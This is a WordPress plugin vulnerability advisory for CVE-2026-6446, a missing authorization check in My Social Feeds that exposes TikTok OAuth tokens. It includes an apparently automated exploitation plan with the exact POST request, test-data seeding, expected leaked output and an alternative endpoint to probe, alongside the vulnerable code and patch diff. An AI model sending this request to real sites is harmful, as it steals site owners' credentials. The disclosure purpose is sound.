WP-Safety
CVE-2026-6446

My Social Feeds <= 1.0.4 - Missing Authorization to Unauthenticated Sensitive Information Exposure via 'ttp_get_accounts' AJAX Action

mediumInsufficiently Protected Credentials
5.4
CVSS Score
5.4
CVSS Score
medium
Severity
1.0.5
Patched in
1d
Time to patch

Description

The My Social Feeds – Social Feeds Embedder plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to and including 1.0.4 via the 'ttp_get_accounts' AJAX action. This is due to the complete absence of authorization checks (no capability verification) and nonce verification in the get_accounts() function, which returns the full contents of the 'ttp_tiktok_accounts' WordPress option. This makes it possible for authenticated attackers, with Subscriber-level access and above, to retrieve sensitive TikTok OAuth credentials, including access_token and refresh_token values, that belong to administrator-connected TikTok accounts, enabling them to impersonate the site owner when interacting with the TikTok API.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Unchanged
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=1.0.4
PublishedMay 1, 2026
Last updatedMay 2, 2026
Affected pluginmy-social-feeds

What Changed in the Fix

Changes introduced in v1.0.5

Loading patch diff...

Source Code

WordPress.org SVN
Vulnerable v1.0.4
Browse source Download .zip
Patched v1.0.5
Browse source Download .zip
Research Plan
Unverified

# Exploitation Research Plan - CVE-2026-6446 ## 1. Vulnerability Summary The **My Social Feeds** plugin (up to version 1.0.4) contains a sensitive information exposure vulnerability via its AJAX handler for the `ttp_get_accounts` action. The `get_accounts()` function in the `TTPTiktokAPI` class lac…

Show full research plan

Exploitation Research Plan - CVE-2026-6446

1. Vulnerability Summary

The My Social Feeds plugin (up to version 1.0.4) contains a sensitive information exposure vulnerability via its AJAX handler for the ttp_get_accounts action. The get_accounts() function in the TTPTiktokAPI class lacks both capability checks (current_user_can) and nonce verification (check_ajax_referer). This allows any authenticated user, including those with Subscriber privileges, to retrieve the full contents of the ttp_tiktok_accounts WordPress option, which contains TikTok OAuth credentials (access_token, refresh_token, and open_id).

2. Attack Vector Analysis

  • Endpoint: /wp-admin/admin-ajax.php
  • Action: ttp_get_accounts
  • HTTP Method: POST or GET (AJAX actions typically support both, but POST is standard).
  • Authentication: Required (Subscriber level or higher).
  • Vulnerable Parameter: None (the action itself triggers the data dump).
  • Payload: action=ttp_get_accounts

3. Code Flow

  1. Entry Point: The plugin registers the AJAX action in includes/TiktokAPI.php:
    add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);
    Note: There is no corresponding wp_ajax_nopriv_ttp_get_accounts, confirming authentication is required.
  2. Sink: The get_accounts() function (located in includes/TiktokAPI.php at approximately line 156) is called.
  3. Execution: In the vulnerable version (1.0.4), the function likely reads the option and returns it directly:
    public function get_accounts() {
    // Vulnerable version lacks: if (!current_user_can('manage_options')) return;
    // Vulnerable version lacks: check_ajax_referer('...', '...');
    $accounts = get_option('ttp_tiktok_accounts', []);
    wp_send_json_success($accounts);
}
  4. Data Leak: The ttp_tiktok_accounts option stores an associative array where keys are TikTok open_ids and values include access_token and refresh_token.

4. Nonce Acquisition Strategy

According to the vulnerability description, the get_accounts() function completely lacks nonce verification. Therefore, no nonce is required to exploit this endpoint.

If testing reveals a nonce is required (i.e., the description was inaccurate), the nonce would typically be generated in build/admin-dashboard.js and localized. However, based on the PR:L severity and the "Missing Authorization" description, the exploit should succeed with just a valid Subscriber session.

5. Exploitation Strategy

Step-by-Step Plan:

  1. Authentication: Log in as a Subscriber-level user to obtain a session cookie.
  2. Execution: Send a POST request to admin-ajax.php with the action parameter set to ttp_get_accounts.
  3. Capture: Parse the JSON response to extract TikTok credentials.

Required HTTP Request:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Cookie: [Subscriber Cookies]

action=ttp_get_accounts

6. Test Data Setup

To verify the leak, mock data must exist in the database. Use WP-CLI to seed the sensitive option:

# Seed the TikTok accounts option with dummy sensitive data
wp option update ttp_tiktok_accounts '{
    "test_open_id_123": {
        "account_id": "test_open_id_123",
        "display_name": "Attacker Target",
        "access_token": "SENSITIVE_ACCESS_TOKEN_XYZ_999",
        "refresh_token": "SENSITIVE_REFRESH_TOKEN_ABC_111",
        "expires_at": 1999999999
    }
}' --format=json

7. Expected Results

A successful exploit will return a 200 OK response with a JSON body:

{
    "success": true,
    "data": {
        "test_open_id_123": {
            "account_id": "test_open_id_123",
            "display_name": "Attacker Target",
            "access_token": "SENSITIVE_ACCESS_TOKEN_XYZ_999",
            "refresh_token": "SENSITIVE_REFRESH_TOKEN_ABC_111",
            "expires_at": 1999999999
        }
    }
}

8. Verification Steps

  1. Observe Output: Verify the returned JSON contains the access_token and refresh_token seeded in Step 6.
  2. Access Control Check: Attempt the same request without a cookie to ensure wp_ajax_ correctly blocks unauthenticated requests (returning 400 or 0).
  3. Privilege Check: Confirm the user used for exploitation has only the subscriber role:
    wp user get <username> --field=roles

9. Alternative Approaches

If the ttp_get_accounts endpoint is somehow blocked, examine ttp_tiktok_videos (registered for nopriv):

add_action('wp_ajax_ttp_tiktok_videos', [$this, 'get_videos']);
add_action('wp_ajax_nopriv_ttp_tiktok_videos', [$this, 'get_videos']);

Check if get_videos leaks the account info in its response or through error messages if an invalid open_id is provided. However, get_accounts is the primary and direct target for this CVE.

Research Findings
Static analysis — not yet PoC-verified

Summary

The My Social Feeds plugin for WordPress is vulnerable to sensitive information exposure due to a missing authorization check on its 'ttp_get_accounts' AJAX action. Authenticated attackers, including those with Subscriber-level privileges, can exploit this to retrieve sensitive TikTok OAuth tokens (access and refresh tokens) stored in the WordPress options table.

Vulnerable Code

// includes/TiktokAPI.php

// Line 25
add_action('wp_ajax_ttp_get_accounts', [$this, 'get_accounts']);

// ...

// Line 156
public function get_accounts() {
    $accounts = get_option('ttp_tiktok_accounts', []);
    wp_send_json_success($accounts);
}

Security Fix

--- includes/TiktokAPI.php
+++ includes/TiktokAPI.php
@@ -156,5 +156,8 @@
 
     public function get_accounts() {
+        if ( ! current_user_can( 'manage_options' ) ) {
+            wp_send_json_error( 'Unauthorized' );
+        }
         $accounts = get_option('ttp_tiktok_accounts', []);
         wp_send_json_success($accounts);
     }

Exploit Outline

To exploit this vulnerability, an attacker needs a valid login session on the WordPress site (Subscriber level or higher). The attacker sends a request to the /wp-admin/admin-ajax.php endpoint with the action parameter set to 'ttp_get_accounts'. Because the plugin fails to verify user capabilities or nonces for this action, it returns the full contents of the 'ttp_tiktok_accounts' option, which includes sensitive TikTok OAuth credentials (access_token, refresh_token, and open_id) belonging to the site administrator.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/d46d6493-8b89-4258-9d83-79e5946cd76f?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database